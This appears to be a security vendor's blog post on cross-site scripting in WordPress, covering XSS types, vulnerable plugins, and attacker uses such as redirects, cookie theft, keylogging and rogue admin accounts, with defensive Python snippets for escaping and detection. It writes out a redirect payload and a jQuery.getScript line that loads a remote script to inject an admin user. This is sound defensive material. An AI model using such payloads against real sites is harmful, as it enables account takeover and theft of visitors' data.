

Vulnerabilities are a fact of life for anyone managing a website, even when using a well-established content management system like WordPress. Not all vulnerabilities are equal: some allow access to sensitive data that would normally be hidden from public view, while others could allow a malicious actor to take full control of an affected website. There are many types of vulnerabilities, including broken access control, misconfiguration, data integrity failures, and injection, among others. One type of injection vulnerability that is often underestimated, but can pose a wide range of threats to a website, is Cross-Site Scripting, also known as “XSS”. In a single 30-day period, Wordfence blocked a total of 31,153,743 XSS exploit attempts, making this one of the most common attack types we see.

What is Cross-Site Scripting?

Cross-Site Scripting is a type of vulnerability that allows a malicious actor to inject code, usually JavaScript, into otherwise legitimate websites. The web browser being used by the website user has no way to determine that the code is not a legitimate part of the website, so it displays content or performs actions directed by the malicious code. XSS is a relatively well-known type of vulnerability, partially because some of its uses are visible on an affected website, but there are also “invisible” uses that can be much more detrimental to website owners and their visitors.

Without breaking XSS down into its various uses, there are three primary categories of XSS that each have different aspects that could be valuable to a malicious actor. The types of XSS are split into stored, reflected, and DOM-based XSS. Stored XSS also includes a sub-type known as blind XSS.

Stored Cross-Site Scripting could be considered the most nefarious type of XSS. These vulnerabilities allow exploits to be stored on the affected server. This could be in a comment, review, forum, or other element that keeps the content stored in a database or file either long-term or permanently. Any time a victim visits a location where the script is rendered, the stored exploit will be executed in their browser.

An example of an authenticated stored XSS vulnerability can be found in version 4.16.5 or older of the Leaky Paywall plugin. This vulnerability allowed code to be entered into the Thousand Separator and Decimal Separator fields and saved in the database. Any time this tab was loaded, the saved code would load. For this example, we used the JavaScript onmouseover event handler to run the injected code whenever the mouse went over the text box, but this could easily be changed to onload to run the code as soon as the page loads, or even onclick so it would run when a user clicks a specified page element. The vulnerability existed due to a lack of proper input validation and sanitization in the plugin’s class.php file. While we have chosen a less-severe example that requires administrator permissions to exploit, many other vulnerabilities of this type can be exploited by unauthenticated attackers.
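
To illustrate why missing output escaping matters for a field like this, here is a minimal sketch in Python. It is not the plugin's code: the function name, the field name, and the payload are hypothetical, and WordPress itself would use its own helpers such as esc_attr() for the same purpose. The sketch only shows how escaping quotes keeps a stored value from breaking out of an HTML attribute.

```python
from html import escape


def render_separator_field(name: str, stored_value: str) -> str:
    """Render a text input, escaping the stored value for an HTML attribute."""
    # quote=True also escapes " and ', so the value cannot close the attribute.
    safe_value = escape(stored_value, quote=True)
    return f'<input type="text" name="{name}" value="{safe_value}">'


# Hypothetical payload: it tries to close the value attribute and attach
# an onmouseover handler to the input element.
payload = '," onmouseover="alert(1)'

# Without escaping, the handler becomes a real attribute of the element.
unsafe_html = f'<input type="text" name="thousand_separator" value="{payload}">'

# With escaping, the same text stays inside the value attribute as data.
safe_html = render_separator_field("thousand_separator", payload)

print(unsafe_html)
print(safe_html)
```

In the unescaped version the browser sees a separate onmouseover attribute; in the escaped version the quotes are rendered as entities and the text remains inert.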

Blind Cross-Site Scripting is a sub-type of stored XSS that is not rendered in a public location. As it is still stored on the server, this category is not considered a separate type of XSS itself. In an attack utilizing blind XSS, the malicious actor will need to submit their exploit to a location that would be accessed by a back-end user, such as a site administrator. One example would be a feedback form that submits feedback to the administrator regarding site features. When the administrator logs in to the website’s admin panel, and accesses the feedback, the exploit will run in the administrator’s browser.

This type of exploit is relatively common in WordPress, with malicious actors taking advantage of aspects of the site that provide data in the administrator panel. One such vulnerability was exploitable in version 13.1.5 or earlier of the WP Statistics plugin, which is designed to provide information on website visitors. If the Cache Compatibility option was enabled, then an unauthenticated user could visit any page on the site and grab the _wpnonce from the source code, and use that nonce in a specially crafted URL to inject JavaScript or other code that would run when statistics pages are accessed by an administrator. This vulnerability was the result of improper escaping and sanitization on the ‘platform’ parameter.

Reflected Cross-Site Scripting is a more interactive form of XSS. This type of XSS executes immediately and requires tricking the victim into submitting the malicious payload themselves, often by clicking on a crafted link or visiting an attacker-controlled form. The exploits for reflected XSS vulnerabilities often use arguments added to a URL, search results, and error messages to return data back in the browser, or send data to a malicious actor. Essentially, the threat actor crafts a URL or form field entry to inject their malicious code, and the website will incorporate that code in the submission process for the vulnerable function. Attacks utilizing reflected XSS may require an email or message containing a specially crafted link to be opened by an administrator or other site user in order to obtain the desired result from the exploit. This XSS type generally involves some degree of social engineering in order to be successful. It’s worth noting that the payload is never stored on the server, so the chance of success relies on the initial interaction with the user.
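
The reflection described above can be sketched as follows. This is an illustrative Python example, not WordPress code: the handler name, the example.com URL, and the payload are assumptions. It shows a value taken from a crafted URL being echoed back into a page, and how HTML-escaping the value before output keeps it from being interpreted as markup.

```python
from html import escape
from urllib.parse import parse_qs, urlsplit


def render_search_heading(url: str) -> str:
    """Echo the 's' query parameter back into a heading, escaped for HTML."""
    query = parse_qs(urlsplit(url).query)  # parse_qs also percent-decodes values
    term = query.get("s", [""])[0]
    # Escaping turns < and > into entities, so the browser shows the text
    # instead of executing it.
    return f"<h1>Search results for: {escape(term)}</h1>"


# Hypothetical crafted link of the kind an attacker might send to a victim.
crafted_url = "https://example.com/?s=%3Cscript%3Ealert(1)%3C%2Fscript%3E"

print(render_search_heading(crafted_url))
```

If the heading were built from the raw parameter instead, the script element would be part of the response and would run as soon as the victim opened the link.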

In January of 2022, the Wordfence team discovered a reflected XSS vulnerability in the Profile Builder – User Profile & User Registration Forms plugin. The vulnerability allowed the page to be modified simply by crafting a URL for the site. Here we generated an alert using the site_url parameter and updated the page text to read “404 Page Not Found”, as this is a common error message that is unlikely to cause alarm but could entice a victim to click on the redirect link that will trigger the pop-up.

DOM-Based Cross-Site Scripting is similar to reflected XSS, with the defining difference being that the modifications are made entirely in the DOM environment. Essentially, an attack using DOM-based XSS does not require any action to be taken on the server, only in the victim’s browser. While the HTTP response from the server remains unchanged, a DOM-based XSS vulnerability can still allow a malicious actor to redirect a visitor to a site under their control, or even collect sensitive data.

One example of a DOM-based vulnerability can be found in versions older than 3.4.4 of the Elementor page builder plugin. This vulnerability allowed unauthenticated users to inject JavaScript code into pages that had been edited using either the free or Pro versions of Elementor. The vulnerability was in the lightbox settings, with the payload formatted as JSON and encoded in base64.
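
When reviewing a suspicious link, a payload that is JSON wrapped in base64 can be unpacked for inspection. The sketch below is a rough illustration in Python; the settings object and its field names are invented and do not reflect Elementor's actual lightbox format. It decodes the blob and collects any string values that use the javascript: scheme.

```python
import base64
import json


def decode_settings(encoded: str) -> dict:
    """Decode a base64 string that wraps a JSON object."""
    return json.loads(base64.b64decode(encoded).decode("utf-8"))


def find_script_urls(value) -> list:
    """Recursively collect string values that start with the javascript: scheme."""
    if isinstance(value, str):
        return [value] if value.strip().lower().startswith("javascript:") else []
    if isinstance(value, dict):
        return [hit for item in value.values() for hit in find_script_urls(item)]
    if isinstance(value, list):
        return [hit for item in value for hit in find_script_urls(item)]
    return []


# Hypothetical settings object; the field names are invented for illustration.
settings = {"type": "image", "url": "javascript:alert(1)", "title": "Gallery"}
encoded = base64.b64encode(json.dumps(settings).encode("utf-8")).decode("ascii")

decoded = decode_settings(encoded)
print(encoded)
print(find_script_urls(decoded))
```

Because the encoded form contains no angle brackets or obvious keywords, a payload like this is easy to overlook until it is decoded.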

How Does Cross-Site Scripting Impact WordPress Sites?

Cross-Site Scripting (XSS) vulnerabilities can have a number of repercussions for WordPress websites. Because WordPress websites are dynamically generated on page load, content is updated and stored within a database. This can make it easier for a malicious actor to exploit a stored or blind XSS vulnerability on the website, which means an attacker often does not need to rely on social engineering for their XSS payload to execute.

Using Cross-Site Scripting to Manipulate Websites

One of the most well-known ways that XSS affects WordPress websites is by manipulating the page content. This can be used to generate popups, inject spam, or even redirect a visitor to another website entirely. This use of XSS provides malicious actors with the ability to make visitors lose faith in a website, view ads or other content that would otherwise not be seen on the website, or even convince a visitor that they are interacting with the intended website despite being redirected to a look-alike domain or similar website that is under the control of the malicious actor.



When testing for XSS vulnerabilities, security researchers often use a simple method such as alert(), prompt(), or print() to check whether the browser will execute the method and display the information contained in the payload. A test like this generally causes little to no harm to the impacted website.

This method can also be used to prompt a visitor to provide sensitive information, or interact with the page in ways that would normally not be intended and could lead to damage to the website or stolen information.

One common type of XSS payload we see when our team performs site cleanings is a redirect. As previously mentioned, XSS vulnerabilities can utilize JavaScript to get the browser to perform actions. In this case an attacker can utilize the window.location.replace() method or other similar method in order to redirect the victim to another site. This can be used by an attacker to redirect a site visitor to a separate malicious domain that could be used to further infect the victim or steal sensitive information.

In this example, we used onload=location.replace("https://wordfence.com") to redirect the visitor to wordfence.com. The use of onload means that the script runs as soon as the element of the page that the script is attached to loads. Generating a specially crafted URL in this manner is a common method used by threat actors to get users and administrators to land on pages under the actor’s control. To further hide the attack from a potential victim, URL encoding can be used to change the appearance of the URL and make the malicious code more difficult to spot. This can even be taken one step further in some cases by slightly modifying the JavaScript and using character encoding prior to URL encoding. Character encoding helps bypass certain character restrictions that might otherwise prevent an attack from being successful.
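
The effect of URL encoding on the payload above can be sketched in Python with the standard urllib.parse module. The helper name fully_decode and the idea of decoding in a loop are assumptions added for illustration: since encodings may be layered, a reviewer may need to decode more than once before the original text is visible.

```python
from urllib.parse import quote, unquote

# The payload string quoted in the paragraph above.
payload = 'onload=location.replace("https://wordfence.com")'

# Percent-encode every reserved character so the payload is harder to read.
encoded_once = quote(payload, safe="")
# Encoding the result again hides even the percent-escapes themselves.
encoded_twice = quote(encoded_once, safe="")


def fully_decode(value: str, max_rounds: int = 5) -> str:
    """Percent-decode repeatedly until the value stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


print(encoded_once)
print(encoded_twice)
print(fully_decode(encoded_twice))
```

Decoding before inspection is what makes the parentheses, quotes, and URL in the payload recognizable again.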



When discussing manipulation of websites, it is hard to ignore site defacements. This is the most obvious form of attack on a website, as it is often used to replace the intended content of the website with a message from the bad actor. This is often accomplished by using JavaScript to force the bad actor’s intended content to load in place of the original site content. Utilizing JavaScript methods like document.getElementById(), or properties like window.location, it is possible to replace page elements, or even the entire page, with new content. Defacements require a stored XSS vulnerability, as the malicious actor would want to ensure that all site visitors see the defacement.

This is, of course, not the only way to deface a website. A defacement could be as simple as modifying elements of the page, such as changing the background color or adding text to the page. These are accomplished in much the same way, by using JavaScript to replace page elements.

Stealing Data With Cross-Site Scripting

XSS is one of the easier vulnerabilities a malicious actor can exploit in order to steal data from a website. Specially crafted URLs can be sent to administrators or other site users to add elements to the page that send form data to the malicious actor as well as, or instead of, the intended location of the data being submitted on the website under normal conditions.



The cookies generated by a website can contain sensitive data or even allow an attacker to access an authenticated user’s account directly. One of the simplest methods of viewing the active cookies on a website is to read the document.cookie JavaScript property, which lists the cookies available to scripts on the page. In this example, we sent the cookies to an alert box, but they can just as easily be sent to a server under the attacker’s control, without even being noticeable to the site visitor.
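
One related detail is that browsers do not expose cookies marked HttpOnly through document.cookie. As a minimal sketch, assuming a hypothetical cookie named session_id, the Python standard library can build a Set-Cookie value with that flag:

```python
from http.cookies import SimpleCookie

# Hypothetical session cookie; the name and value are placeholders.
cookie = SimpleCookie()
cookie["session_id"] = "example-value"
cookie["session_id"]["httponly"] = True      # not readable via document.cookie
cookie["session_id"]["secure"] = True        # only sent over HTTPS
cookie["session_id"]["samesite"] = "Strict"  # not sent on cross-site requests

# The value that would follow "Set-Cookie:" in the HTTP response.
header_value = cookie["session_id"].OutputString()
print(header_value)
```

This does not fix an XSS vulnerability, and injected scripts can still act within the victim's session, but it limits what a cookie-stealing payload can read.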

While form data theft is less common, it can have a significant impact on site owners and visitors. The most common way this would be used by a malicious actor is to steal credit card information. It is possible to simply send input from a form directly to a server under the bad actor’s control; however, it is much more common to use a keylogger. Many payment processing solutions embed forms from their own sites, which typically cannot be directly accessed by JavaScript running in the context of an infected site. The use of a keylogger helps ensure that usable data will be received, which may not always be the case when simply collecting form data as it is submitted to the intended location.

Here we used character encoding to obfuscate the JavaScript keystroke collector, as well as to make it easy to run directly from a maliciously crafted link. This then sends collected keystrokes to a server under the threat actor’s control, where a PHP script is used to write the collected keystrokes to a log file. This technique could be used as we did here to target specific victims, or a stored XSS vulnerability could be taken advantage of in order to collect keystrokes from any site visitor who visits a page that loads the malicious JavaScript code. In either use case, an XSS vulnerability must exist on the target website.
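
The exact encoding used above is not shown, so the following is only an assumption: one common form of character encoding in JavaScript is a String.fromCharCode() call with a list of numeric character codes. When cleaning a site or reviewing logs, such calls can be expanded back into readable text. A rough Python sketch, using a harmless alert(1) as the hidden string:

```python
import re

# Matches String.fromCharCode(...) calls whose arguments are plain decimal codes.
CHARCODE_CALL = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")


def reveal_char_codes(script: str) -> str:
    """Replace String.fromCharCode(...) calls with the quoted text they produce."""

    def _decode(match: re.Match) -> str:
        codes = [int(code) for code in match.group(1).split(",") if code.strip()]
        return repr("".join(chr(code) for code in codes))

    return CHARCODE_CALL.sub(_decode, script)


# Harmless stand-in for an obfuscated script found in a crafted link.
obfuscated = "eval(String.fromCharCode(97,108,101,114,116,40,49,41))"
print(reveal_char_codes(obfuscated))
```

The sketch only handles decimal codes passed directly to the call; scripts obfuscated in other ways would need different handling.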

If this form of data theft is used on a vulnerable login page, a threat actor could easily gain access to usernames and passwords that could be used in later attacks. These attacks could be against the same website, or used in credential stuffing attacks against a variety of websites such as email services and financial institutions.

Taking Advantage of Cross-Site Scripting to Take Over Accounts

Perhaps one of the most dangerous types of attacks that are possible through XSS vulnerabilities is an account takeover. This can be accomplished through a variety of methods, including the use of stolen cookies, similar to the example above. In addition to simply using cookies to access an administrator account, malicious actors will often create fake administrator accounts under their control, and may even inject backdoors into the website. Backdoors then give the malicious actor the ability to perform further actions at a later time.

If an XSS vulnerability exists on a site, injecting a malicious administrator user can be light work for a threat actor if they can get an administrator of a vulnerable website to click a link that includes an encoded payload, or if another stored XSS vulnerability can be exploited. In this example we injected the admin user by pulling the malicious code from a web-accessible location, using a common URL shortener to further hide the true location of the malicious script. That link can then be utilized in a specially crafted URL, or injected into a vulnerable form with something like onload=jQuery.getScript('https://bit.ly/<short_code>'); to load the script that injects a malicious admin user when the page loads.

Backdoors are a way for a malicious actor to retain access to a website or system beyond the initial attack. This makes backdoors very useful for any threat actor that intends to continue modifying their attack, collect data over time, or regain access if an injected malicious admin user is removed by a site administrator. While JavaScript running in an administrator’s session can be used to add PHP backdoors to a website by editing plugin or theme files, it is also possible to “backdoor” a visitor’s browser, allowing an attacker to run arbitrary commands as the victim in real time. In this example, we used a JavaScript backdoor that could be connected to from a Python shell running on a system under the threat actor’s control. This allows the threat actor to run commands directly in the victim’s browser, allowing the attacker to directly take control of it, and potentially opening up further attacks to the victim’s computer depending on whether the browser itself has any unpatched vulnerabilities.

Often, a backdoor is used to retain access to a website or server, but what is unique about this example is the use of an XSS vulnerability in a website in order to gain access to the computer being used to access the affected website. If a threat actor can get the JavaScript payload to load any time a visitor accesses a page, such as through a stored XSS vulnerability, then any visitor to that page on the website becomes a potential victim.

Tools Make Light Work of Exploits

There are tools available that make it easy to exploit vulnerabilities like Cross-Site Scripting (XSS). Some tools are created by malicious actors for malicious actors, while others are created by cybersecurity professionals for the purpose of testing for vulnerabilities in order to prevent the possibility of an attack. No matter what the purpose of the tool is, if it works, malicious actors will use it. One such tool is a freely available penetration testing tool called BeEF. This tool is designed to work with a browser to find client-side vulnerabilities in a web app. This tool is great for administrators, as it allows them to easily test their own web apps for XSS and other client-side vulnerabilities that may be present. The flip side of this is that it can also be used by threat actors looking for potential attack targets.



One thing that is consistent in all of these exploits is the use of requests to manipulate the website. These requests can be logged, and used to block malicious actions based on the request parameters and the strings contained within the request. The one exception is DOM-based XSS, which cannot be logged on the web server because it is processed entirely within the victim’s browser. The request parameters that malicious actors typically use in their requests are often common fields, such as the WordPress search parameter of $_GET['s'], and are often just guesswork, hoping to find a common parameter with an exploitable vulnerability. The most common request parameter we have seen threat actors attempting to attack recently is $_GET['url'], which is typically used to identify the domain name of the server the website is loaded from.
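
As a rough illustration of matching on request parameters, the Python sketch below flags query parameters whose decoded values contain a few strings commonly seen in XSS attempts. It is not how the Wordfence firewall works: the pattern list, the function name, and the example URLs are assumptions, and a real rule set would be far more thorough and would produce fewer false positives.

```python
import re
from typing import List
from urllib.parse import parse_qsl, urlsplit

# Deliberately small, hypothetical pattern list: script tags, javascript: URLs,
# and inline event handlers such as onload= or onmouseover=.
SUSPICIOUS = re.compile(r"<\s*script|javascript:|\bon\w+\s*=", re.IGNORECASE)


def suspicious_params(url: str) -> List[str]:
    """Return the names of query parameters whose decoded values look like XSS."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return [name for name, value in pairs if SUSPICIOUS.search(value)]


# Hypothetical logged requests.
requests_seen = [
    "https://example.com/?s=hello+world",
    "https://example.com/?s=%3Cscript%3Ealert(1)%3C/script%3E&page=2",
    "https://example.com/?url=javascript:alert(1)",
]

for request_url in requests_seen:
    print(request_url, suspicious_params(request_url))
```

Because parse_qsl decodes percent-encoded values before the pattern is applied, a singly URL-encoded payload in a common parameter such as s or url is still matched.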

Conclusion

Cross-Site Scripting (XSS) is a powerful, yet often underrated, type of vulnerability, at least when it comes to WordPress instances. While XSS has been a long-standing vulnerability in the OWASP Top 10, many people think of it only as the ability to inject content like a popup. Few realize that a malicious actor could use this type of vulnerability to inject spam into a web page, redirect a visitor to the website of their choice, convince a site visitor to provide their username and password, or even take over the website with relative ease, all thanks to the capabilities of JavaScript and a working knowledge of the backend platform.

One of the best ways to protect your website against XSS vulnerabilities is to keep WordPress and all of your plugins updated. Sometimes attackers target a zero-day vulnerability, and a patch is not available immediately, which is why the Wordfence firewall comes with built-in XSS protection to protect all Wordfence users, including Free, Premium, Care, and Response, against XSS exploits. If you believe your site has been compromised as a result of an XSS vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.

Source:

https://www.wordfence.com/blog/2022/09/cross-site-scripting-the-real-wordpress-supervillain/